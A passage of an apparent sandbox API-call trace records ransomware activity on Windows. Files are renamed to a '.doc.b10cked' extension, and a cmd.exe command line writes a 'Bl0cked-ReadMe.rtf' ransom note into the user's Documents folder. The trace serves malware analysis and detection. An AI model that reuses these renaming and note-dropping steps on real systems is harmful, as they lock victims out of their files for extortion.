[0141.045] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f58c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f584, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f584*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", 
_MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0141.046] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0141.047] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0141.047] _wcsicmp (_String1="BDJO8C~1.DOC", _String2=".") returned 52 [0141.047] _wcsicmp (_String1="BDJO8C~1.DOC", _String2="..") returned 52 [0141.047] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bdjo8c~1.doc")) returned 0x20 [0141.047] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2e1ed0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.047] SetErrorMode (uMode=0x0) returned 0x0 [0141.047] SetErrorMode (uMode=0x1) returned 0x0 [0141.047] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC", nBufferLength=0x104, lpBuffer=0x16ef14, lpFilePart=0x16eefc | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC", lpFilePart=0x16eefc*="BDJO8C~1.DOC") returned 0x34 [0141.047] SetErrorMode (uMode=0x0) returned 0x1 [0141.048] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd")) returned 0x12 [0141.048] _wcsicmp (_String1="BDJO8C~1.DOC", _String2=".") returned 52 [0141.048] _wcsicmp (_String1="BDJO8C~1.DOC", _String2="..") returned 52 [0141.048] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bdjo8c~1.doc")) returned 0x20 [0141.048] SetErrorMode (uMode=0x0) returned 0x0 [0141.048] SetErrorMode (uMode=0x1) returned 0x0 [0141.048] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC", nBufferLength=0x104, lpBuffer=0x16f390, lpFilePart=0x16f128 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC", lpFilePart=0x16f128*="BDJO8C~1.DOC") returned 0x34 [0141.048] SetErrorMode (uMode=0x0) returned 0x1 [0141.049] SetErrorMode (uMode=0x0) returned 0x0 [0141.049] SetErrorMode (uMode=0x1) returned 0x0 [0141.049] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked", nBufferLength=0x104, lpBuffer=0x16f598, lpFilePart=0x16f128 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked", lpFilePart=0x16f128*="bDJO8cWgfh9q_unjpPU-.doc.b10cked") returned 0x48 [0141.049] SetErrorMode (uMode=0x0) returned 0x1 [0141.049] SetLastError (dwErrCode=0x0) [0141.049] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked" (normalized: 
"c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bdjo8cwgfh9q_unjppu-.doc.b10cked")) returned 0xffffffff [0141.049] GetLastError () returned 0x2 [0141.049] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x16eaa4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16eaa4) returned 0x2d0f50 [0141.049] FindNextFileW (in: hFindFile=0x2d0f50, lpFindFileData=0x16eaa4 | out: lpFindFileData=0x16eaa4) returned 0 [0141.050] GetLastError () returned 0x12 [0141.050] FindClose (in: hFindFile=0x2d0f50 | out: hFindFile=0x2d0f50) returned 1 [0141.051] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x2e1c70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2e1c70) returned 0x2d0f50 [0141.051] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked", nBufferLength=0x104, lpBuffer=0x16ed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked", lpFilePart=0x0) returned 0x48 [0141.051] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc", nBufferLength=0x104, lpBuffer=0x16ed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc", lpFilePart=0x0) returned 0x40 [0141.051] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bdjo8cwgfh9q_unjppu-.doc")) returned 0x20 [0141.052] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bdjo8cwgfh9q_unjppu-.doc"), 
lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bdjo8cwgfh9q_unjppu-.doc.b10cked"), dwFlags=0x3) returned 1 [0141.052] FindClose (in: hFindFile=0x2d0f50 | out: hFindFile=0x2d0f50) returned 1 [0141.052] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16ecf0 | out: _Buffer=" 1") returned 9 [0141.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.052] GetFileType (hFile=0x7) returned 0x2 [0141.053] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0141.053] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ec7c | out: lpMode=0x16ec7c) returned 1 [0141.053] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.053] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ecb0 | out: lpConsoleScreenBufferInfo=0x16ecb0) returned 1 [0141.053] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0141.054] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16ecf0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0141.054] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16ecd4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16ecd4*=0x1a) returned 1 [0141.054] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.054] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.054] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.054] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.055] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.055] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.055] 
SetConsoleInputExeNameW () returned 0x1 [0141.055] GetConsoleOutputCP () returned 0x1b5 [0141.055] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.055] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.055] exit (_Code=0) Process: id = "152" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0x738" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14576 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14577 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14578 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14579 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 14580 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14581 
start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14582 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14583 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14584 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14585 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16214 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16215 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16216 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16217 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 16218 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 16219 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16220 start_va = 
0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16221 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16222 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16223 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16224 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16225 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16226 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16227 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16228 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 16229 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = 
"imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16230 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16231 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16232 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 16233 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16234 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 16235 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 16236 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 16237 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Thread: id = 211 os_tid = 0x4d4 [0142.045] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef9dc | out: lpSystemTimeAsFileTime=0x1ef9dc*(dwLowDateTime=0x8e987da0, dwHighDateTime=0x1d440a9)) [0142.045] GetCurrentProcessId () returned 0x738 [0142.045] GetCurrentThreadId () returned 0x4d4 [0142.045] GetTickCount () returned 0x2c7c1 [0142.045] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef9d4 | out: lpPerformanceCount=0x1ef9d4*=19883397552) returned 1 [0142.045] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0142.045] __set_app_type (_Type=0x1) [0142.045] __p__fmode () 
returned 0x76b331f4 [0142.046] __p__commode () returned 0x76b331fc [0142.046] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0142.046] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0142.046] GetCurrentThreadId () returned 0x4d4 [0142.046] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x4d4) returned 0x38 [0142.046] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0142.046] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0142.046] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.046] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0142.046] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef96c | out: phkResult=0x1ef96c*=0x0) returned 0x2 [0142.047] VirtualQuery (in: lpAddress=0x1ef9a3, lpBuffer=0x1ef93c, dwLength=0x1c | out: lpBuffer=0x1ef93c*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.047] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1ef93c, dwLength=0x1c | out: lpBuffer=0x1ef93c*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0142.047] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1ef93c, dwLength=0x1c | out: lpBuffer=0x1ef93c*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0142.047] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1ef93c, dwLength=0x1c | out: lpBuffer=0x1ef93c*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, 
RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.047] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1ef93c, dwLength=0x1c | out: lpBuffer=0x1ef93c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.047] GetConsoleOutputCP () returned 0x1b5 [0142.047] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.047] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0142.047] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.047] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0142.048] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.048] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.048] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.048] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.049] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.049] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.049] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.049] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0142.050] GetEnvironmentStringsW () returned 0x230168* [0142.050] FreeEnvironmentStringsW (penv=0x230168) returned 1 [0142.050] GetEnvironmentStringsW () returned 0x230168* [0142.050] FreeEnvironmentStringsW (penv=0x230168) returned 1 [0142.050] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee8dc | out: phkResult=0x1ee8dc*=0x40) returned 0x0 [0142.050] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x0, lpData=0x1ee8e8*=0x90, lpcbData=0x1ee8e0*=0x1000) returned 0x2 [0142.050] RegQueryValueExW (in: hKey=0x40, 
lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x4, lpData=0x1ee8e8*=0x1, lpcbData=0x1ee8e0*=0x4) returned 0x0 [0142.050] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x0, lpData=0x1ee8e8*=0x1, lpcbData=0x1ee8e0*=0x1000) returned 0x2 [0142.050] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x4, lpData=0x1ee8e8*=0x0, lpcbData=0x1ee8e0*=0x4) returned 0x0 [0142.050] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x4, lpData=0x1ee8e8*=0x40, lpcbData=0x1ee8e0*=0x4) returned 0x0 [0142.051] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x4, lpData=0x1ee8e8*=0x40, lpcbData=0x1ee8e0*=0x4) returned 0x0 [0142.051] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x0, lpData=0x1ee8e8*=0x40, lpcbData=0x1ee8e0*=0x1000) returned 0x2 [0142.051] RegCloseKey (hKey=0x40) returned 0x0 [0142.052] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee8dc | out: phkResult=0x1ee8dc*=0x40) returned 0x0 [0142.052] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x0, lpData=0x1ee8e8*=0x40, lpcbData=0x1ee8e0*=0x1000) returned 0x2 [0142.052] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee8e4, 
lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x4, lpData=0x1ee8e8*=0x1, lpcbData=0x1ee8e0*=0x4) returned 0x0 [0142.052] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x0, lpData=0x1ee8e8*=0x1, lpcbData=0x1ee8e0*=0x1000) returned 0x2 [0142.052] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x4, lpData=0x1ee8e8*=0x0, lpcbData=0x1ee8e0*=0x4) returned 0x0 [0142.053] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x4, lpData=0x1ee8e8*=0x9, lpcbData=0x1ee8e0*=0x4) returned 0x0 [0142.053] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x4, lpData=0x1ee8e8*=0x9, lpcbData=0x1ee8e0*=0x4) returned 0x0 [0142.053] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee8e4, lpData=0x1ee8e8, lpcbData=0x1ee8e0*=0x1000 | out: lpType=0x1ee8e4*=0x0, 